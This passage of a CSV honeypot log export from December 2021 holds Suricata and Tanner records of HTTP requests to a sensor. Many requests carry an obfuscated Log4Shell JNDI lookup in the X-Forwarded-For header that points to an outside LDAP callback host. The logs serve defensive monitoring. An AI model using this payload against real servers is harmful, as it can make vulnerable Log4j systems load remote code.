AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":16240},""app_proto"":""http"",""fileinfo"":{""filename"":""/"",""sid"":[],""magic"":""HTML document, ASCII text, with very long lines (747)"",""gaps"":false,""state"":""CLOSED"",""md5"":""f57e5b6f34eeacc1c32cb643fb59a98e"",""stored"":false,""size"":16240,""tx_id"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,fortunateworkhorse,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T06:23:36.821626+0000",,,,,,,,,Suricata,,,,
"2021-12-15T06:23:36.281Z",1,MBrCvH0B5e7x5EYnv0wD,"logstash-tanner-2021.12.15",,"_doc","ce9644ba-4407-4790-a216-9ed605f3b1d6",6774e89ff91d,"ce444089-8950-47de-880d-7e01a7e0c213",6774e89ff91d,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"The Procter and Gamble Company",11003,,NA,US,US,"United States",,"137.184.105.192","37.751","{""lon"":-97.822,""lat"":37.751}","-97.822",,,,"America/Chicago",,,,"*/*","gzip, deflate",,,"keep-alive",,,"172.16.0.42",,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36","${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",6774e89ff91d,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",5633,,"{""method"": ""GET"", ""path"": ""/"", ""headers"": {""host"": ""172.16.0.42"", ""user-agent"": ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"", ""accept-encoding"": ""gzip, deflate"", ""accept"": ""*/*"", ""connection"": ""keep-alive"", ""x-forwarded-for"": ""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}""}, ""uuid"": ""9a4723dc-b56d-45f3-890b-57900f4d44e9"", ""peer"": {""ip"": ""137.184.105.192"", ""port"": 48384}, ""status"": 200, ""cookies"": {""sess_uuid"": null}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""6e35a4bc-d6a7-410d-a1ae-8ed8ecde665d""}}}, ""timestamp"": ""2021-12-15T06:23:36.281919""}",,,,,,GET,,,,,,"/",,,,,,,,,,,index,1,1,"0.6.0","6e35a4bc-d6a7-410d-a1ae-8ed8ecde665d","0.6.0",,,,,,,,,,,,,,,,,,"137.184.105.192",48384,,,,,,,,,200,,,fortunateworkhorse,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T06:23:36.281919",,,,,,,,,Tanner,,,"9a4723dc-b56d-45f3-890b-57900f4d44e9",
"2021-12-15T06:15:58.949Z",1,ahq7vH0B5e7x5EYnwgvS,"logstash-suricata-2021.12.15",,"_doc","51386ff1-3762-4b11-b0bd-6296d15a7cbf",57bd53164ca3,"21cfcf09-fa6e-491e-b90e-a1469171bb20",57bd53164ca3,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,1223161724960785,"College of St. Scholastica",30376,Duluth,NA,US,US,"United States",676,"143.110.220.95","46.8147","{""lon"":-92.1998,""lat"":46.8147}","-92.1998",55811,MN,Minnesota,"America/Chicago",,,,,,,,,,,,,,,57bd53164ca3,"gzip, deflate",,,,"172.16.0.42","image/x-icon",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",5430,"HTTP/1.1",200,"/core/misc/favicon.ico",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",2208275,,"{""timestamp"":""2021-12-15T06:15:58.949856+0000"",""flow_id"":1223161724960785,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""143.110.220.95"",""src_port"":36704,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":2,""http"":{""hostname"":""172.16.0.42"",""url"":""/core/misc/favicon.ico"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""image/x-icon"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":5430}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"143.110.220.95",36704,,,,,,,,,,,,meresorbet,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T06:15:58.949856+0000",,,,,,,,2,Suricata,,,,
"2021-12-15T06:15:58.949Z",1,axq7vH0B5e7x5EYnwgvS,"logstash-suricata-2021.12.15",,"_doc","51386ff1-3762-4b11-b0bd-6296d15a7cbf",57bd53164ca3,"21cfcf09-fa6e-491e-b90e-a1469171bb20",57bd53164ca3,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"143.110.220.95",36704,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/core/misc/favicon.ico",false,"MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel",cf2445dcb53a031c02f9b57e2199bc03,"[]",5430,CLOSED,false,2,,,,,,,1223161724960785,"Digital Ocean, Inc.",14061,"Santa Clara",NA,US,US,"United States",807,"172.16.0.42","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,,,,,,,,,,,,57bd53164ca3,,,,,"172.16.0.42","image/x-icon",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",5430,"HTTP/1.1",200,"/core/misc/favicon.ico",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",2208938,,"{""timestamp"":""2021-12-15T06:15:58.949856+0000"",""flow_id"":1223161724960785,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""143.110.220.95"",""dest_port"":36704,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""url"":""/core/misc/favicon.ico"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""image/x-icon"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":5430},""app_proto"":""http"",""fileinfo"":{""filename"":""/core/misc/favicon.ico"",""sid"":[],""magic"":""MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel"",""gaps"":false,""state"":""CLOSED"",""md5"":""cf2445dcb53a031c02f9b57e2199bc03"",""stored"":false,""size"":5430,""tx_id"":2}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,meresorbet,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T06:15:58.949856+0000",,,,,,,,,Suricata,,,,
"2021-12-15T06:15:58.863Z",1,Tq67vH0BCXMCNTQLvmBR,"logstash-tanner-2021.12.15",,"_doc","51386ff1-3762-4b11-b0bd-6296d15a7cbf",57bd53164ca3,"21cfcf09-fa6e-491e-b90e-a1469171bb20",57bd53164ca3,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,"c520d9ff-73ed-4c7a-a7ce-3d8043340519",,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"College of St. Scholastica",30376,Duluth,NA,US,US,"United States",676,"143.110.220.95","46.8147","{""lon"":-92.1998,""lat"":46.8147}","-92.1998",55811,MN,Minnesota,"America/Chicago",,,,"*/*","gzip, deflate",,,"keep-alive","sess_uuid=c520d9ff-73ed-4c7a-a7ce-3d8043340519",,"172.16.0.42",,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36","${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",57bd53164ca3,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",5633,,"{""method"": ""GET"", ""path"": ""/core/misc/favicon.ico"", ""headers"": {""host"": ""172.16.0.42"", ""user-agent"": ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"", ""accept-encoding"": ""gzip, deflate"", ""accept"": ""*/*"", ""connection"": ""keep-alive"", ""x-forwarded-for"": ""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"", ""cookie"": ""sess_uuid=c520d9ff-73ed-4c7a-a7ce-3d8043340519""}, ""uuid"": ""a73e356f-899d-42e8-a3c8-1ae06b73cc59"", ""peer"": {""ip"": ""143.110.220.95"", ""port"": 36704}, ""status"": 200, ""cookies"": {""sess_uuid"": ""c520d9ff-73ed-4c7a-a7ce-3d8043340519""}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""6614b041-d16b-4fda-b1cb-fb347d90ab4f""}}}, ""timestamp"": ""2021-12-15T06:15:58.863750""}",,,,,,GET,,,,,,"/core/misc/favicon.ico",,,,,,,,,,,index,1,1,"0.6.0","6614b041-d16b-4fda-b1cb-fb347d90ab4f","0.6.0",,,,,,,,,,,,,,,,,,"143.110.220.95",36704,,,,,,,,,200,,,meresorbet,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T06:15:58.863750",,,,,,,,,Tanner,,,"a73e356f-899d-42e8-a3c8-1ae06b73cc59",
"2021-12-15T06:15:58.851Z",1,aBq7vH0B5e7x5EYnwgvS,"logstash-suricata-2021.12.15",,"_doc","51386ff1-3762-4b11-b0bd-6296d15a7cbf",57bd53164ca3,"21cfcf09-fa6e-491e-b90e-a1469171bb20",57bd53164ca3,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,1223161724960785,"College of St. Scholastica",30376,Duluth,NA,US,US,"United States",676,"143.110.220.95","46.8147","{""lon"":-92.1998,""lat"":46.8147}","-92.1998",55811,MN,Minnesota,"America/Chicago",,,,,,,,,,,,,,,57bd53164ca3,"gzip, deflate",,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",6957,"HTTP/1.1",404,"/favicon.ico",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",2206776,,"{""timestamp"":""2021-12-15T06:15:58.851964+0000"",""flow_id"":1223161724960785,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""143.110.220.95"",""src_port"":36704,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":1,""http"":{""hostname"":""172.16.0.42"",""url"":""/favicon.ico"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":404,""length"":6957}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"143.110.220.95",36704,,,,,,,,,,,,meresorbet,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T06:15:58.851964+0000",,,,,,,,1,Suricata,,,,
"2021-12-15T06:15:58.851Z",1,aRq7vH0B5e7x5EYnwgvS,"logstash-suricata-2021.12.15",,"_doc","51386ff1-3762-4b11-b0bd-6296d15a7cbf",57bd53164ca3,"21cfcf09-fa6e-491e-b90e-a1469171bb20",57bd53164ca3,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"143.110.220.95",36704,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/favicon.ico",false,"HTML document, ASCII text, with very long lines (399)",ee21e3221e5b9336c5fff029b2cef274,"[]",6957,CLOSED,false,1,,,,,,,1223161724960785,"Digital Ocean, Inc.",14061,"Santa Clara",NA,US,US,"United States",807,"172.16.0.42","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,,,,,,,,,,,,57bd53164ca3,,,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",6957,"HTTP/1.1",404,"/favicon.ico",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",2207426,,"{""timestamp"":""2021-12-15T06:15:58.851964+0000"",""flow_id"":1223161724960785,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""143.110.220.95"",""dest_port"":36704,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""url"":""/favicon.ico"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":404,""length"":6957},""app_proto"":""http"",""fileinfo"":{""filename"":""/favicon.ico"",""sid"":[],""magic"":""HTML document, ASCII text, with very long lines (399)"",""gaps"":false,""state"":""CLOSED"",""md5"":""ee21e3221e5b9336c5fff029b2cef274"",""stored"":false,""size"":6957,""tx_id"":1}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,meresorbet,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T06:15:58.851964+0000",,,,,,,,,Suricata,,,,
"2021-12-15T06:15:58.761Z",1,Ta67vH0BCXMCNTQLvmBR,"logstash-tanner-2021.12.15",,"_doc","51386ff1-3762-4b11-b0bd-6296d15a7cbf",57bd53164ca3,"21cfcf09-fa6e-491e-b90e-a1469171bb20",57bd53164ca3,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,"c520d9ff-73ed-4c7a-a7ce-3d8043340519",,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"College of St. Scholastica",30376,Duluth,NA,US,US,"United States",676,"143.110.220.95","46.8147","{""lon"":-92.1998,""lat"":46.8147}","-92.1998",55811,MN,Minnesota,"America/Chicago",,,,"*/*","gzip, deflate",,,"keep-alive","sess_uuid=c520d9ff-73ed-4c7a-a7ce-3d8043340519",,"172.16.0.42",,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36","${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",57bd53164ca3,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",4750,,"{""method"": ""GET"", ""path"": ""/favicon.ico"", ""headers"": {""host"": ""172.16.0.42"", ""user-agent"": ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"", ""accept-encoding"": ""gzip, deflate"", ""accept"": ""*/*"", ""connection"": ""keep-alive"", ""x-forwarded-for"": ""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"", ""cookie"": ""sess_uuid=c520d9ff-73ed-4c7a-a7ce-3d8043340519""}, ""uuid"": ""a73e356f-899d-42e8-a3c8-1ae06b73cc59"", ""peer"": {""ip"": ""143.110.220.95"", ""port"": 36704}, ""status"": 200, ""cookies"": {""sess_uuid"": ""c520d9ff-73ed-4c7a-a7ce-3d8043340519""}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""6614b041-d16b-4fda-b1cb-fb347d90ab4f""}}}, ""timestamp"": ""2021-12-15T06:15:58.761624""}",,,,,,GET,,,,,,"/favicon.ico",,,,,,,,,,,index,1,1,"0.6.0","6614b041-d16b-4fda-b1cb-fb347d90ab4f","0.6.0",,,,,,,,,,,,,,,,,,"143.110.220.95",36704,,,,,,,,,200,,,meresorbet,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T06:15:58.761624",,,,,,,,,Tanner,,,"a73e356f-899d-42e8-a3c8-1ae06b73cc59",
"2021-12-15T06:15:58.747Z",1,Zhq7vH0B5e7x5EYnwgvS,"logstash-suricata-2021.12.15",,"_doc","51386ff1-3762-4b11-b0bd-6296d15a7cbf",57bd53164ca3,"21cfcf09-fa6e-491e-b90e-a1469171bb20",57bd53164ca3,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,1223161724960785,"College of St. Scholastica",30376,Duluth,NA,US,US,"United States",676,"143.110.220.95","46.8147","{""lon"":-92.1998,""lat"":46.8147}","-92.1998",55811,MN,Minnesota,"America/Chicago",,,,,,,,,,,,,,,57bd53164ca3,"gzip, deflate",,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",7554,"HTTP/1.1",200,"/",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",2205296,,"{""timestamp"":""2021-12-15T06:15:58.747755+0000"",""flow_id"":1223161724960785,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""143.110.220.95"",""src_port"":36704,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""url"":""/"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":7554}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"143.110.220.95",36704,,,,,,,,,,,,meresorbet,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T06:15:58.747755+0000",,,,,,,,0,Suricata,,,,
"2021-12-15T06:15:58.747Z",1,Zxq7vH0B5e7x5EYnwgvS,"logstash-suricata-2021.12.15",,"_doc","51386ff1-3762-4b11-b0bd-6296d15a7cbf",57bd53164ca3,"21cfcf09-fa6e-491e-b90e-a1469171bb20",57bd53164ca3,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"143.110.220.95",36704,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/",false,"HTML document, Unicode text, UTF-8 text, with very long lines (399)",22b7d884d99be8e15fc3b1b27008c681,"[]",7554,CLOSED,false,0,,,,,,,1223161724960785,"Digital Ocean, Inc.",14061,"Santa Clara",NA,US,US,"United States",807,"172.16.0.42","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,,,,,,,,,,,,57bd53164ca3,,,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",7554,"HTTP/1.1",200,"/",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",2205935,,"{""timestamp"":""2021-12-15T06:15:58.747755+0000"",""flow_id"":1223161724960785,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""143.110.220.95"",""dest_port"":36704,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""url"":""/"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":7554},""app_proto"":""http"",""fileinfo"":{""filename"":""/"",""sid"":[],""magic"":""HTML document, Unicode text, UTF-8 text, with very long lines (399)"",""gaps"":false,""state"":""CLOSED"",""md5"":""22b7d884d99be8e15fc3b1b27008c681"",""stored"":false,""size"":7554,""tx_id"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,meresorbet,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T06:15:58.747755+0000",,,,,,,,,Suricata,,,,
"2021-12-15T06:15:58.647Z",1,TK67vH0BCXMCNTQLvmBR,"logstash-tanner-2021.12.15",,"_doc","51386ff1-3762-4b11-b0bd-6296d15a7cbf",57bd53164ca3,"21cfcf09-fa6e-491e-b90e-a1469171bb20",57bd53164ca3,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"College of St. Scholastica",30376,Duluth,NA,US,US,"United States",676,"143.110.220.95","46.8147","{""lon"":-92.1998,""lat"":46.8147}","-92.1998",55811,MN,Minnesota,"America/Chicago",,,,"*/*","gzip, deflate",,,"keep-alive",,,"172.16.0.42",,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36","${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",57bd53164ca3,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",3972,,"{""method"": ""GET"", ""path"": ""/"", ""headers"": {""host"": ""172.16.0.42"", ""user-agent"": ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"", ""accept-encoding"": ""gzip, deflate"", ""accept"": ""*/*"", ""connection"": ""keep-alive"", ""x-forwarded-for"": ""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}""}, ""uuid"": ""a73e356f-899d-42e8-a3c8-1ae06b73cc59"", ""peer"": {""ip"": ""143.110.220.95"", ""port"": 36704}, ""status"": 200, ""cookies"": {""sess_uuid"": null}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""c520d9ff-73ed-4c7a-a7ce-3d8043340519""}}}, ""timestamp"": ""2021-12-15T06:15:58.647190""}",,,,,,GET,,,,,,"/",,,,,,,,,,,index,1,1,"0.6.0","c520d9ff-73ed-4c7a-a7ce-3d8043340519","0.6.0",,,,,,,,,,,,,,,,,,"143.110.220.95",36704,,,,,,,,,200,,,meresorbet,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T06:15:58.647190",,,,,,,,,Tanner,,,"a73e356f-899d-42e8-a3c8-1ae06b73cc59",
"2021-12-15T05:16:46.053Z",1,RheFvH0B5e7x5EYnnehz,"logstash-suricata-2021.12.15",,"_doc","b4d59f1e-8a57-4097-80b4-6407af1fac95",633eb5019b79,"17ffd2cf-f0ad-4f82-bf80-a1bffe3bbaf8",633eb5019b79,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,1213961672130821,,,"Santa Clara",NA,US,US,"United States",807,"159.65.97.119","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,,,,,,,,,,,,633eb5019b79,"gzip, deflate",,,,"172.16.0.42","image/x-icon",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",4958,"HTTP/1.1",200,"/core/img/favicon.ico",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",4650811,,"{""timestamp"":""2021-12-15T05:16:46.053460+0000"",""flow_id"":1213961672130821,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""159.65.97.119"",""src_port"":40896,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":2,""http"":{""hostname"":""172.16.0.42"",""url"":""/core/img/favicon.ico"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""image/x-icon"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":4958}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"159.65.97.119",40896,,,,,,,,,,,,distincthose,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T05:16:46.053460+0000",,,,,,,,2,Suricata,,,,
"2021-12-15T05:16:46.053Z",1,RxeFvH0B5e7x5EYnnehz,"logstash-suricata-2021.12.15",,"_doc","b4d59f1e-8a57-4097-80b4-6407af1fac95",633eb5019b79,"17ffd2cf-f0ad-4f82-bf80-a1bffe3bbaf8",633eb5019b79,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"159.65.97.119",40896,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/core/img/favicon.ico",false,"MS Windows icon resource - 1 icon, 34x34, 32 bits/pixel",e467554976ad3162eec9dfbf83e2c324,"[]",4958,CLOSED,false,2,,,,,,,1213961672130821,,,,NA,US,US,"United States",,"172.16.0.42","35.2296","{""lon"":-80.843,""lat"":35.2296}","-80.843",,NC,"North Carolina","America/New_York",,,,,,,,,,,,,,,633eb5019b79,,,,,"172.16.0.42","image/x-icon",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 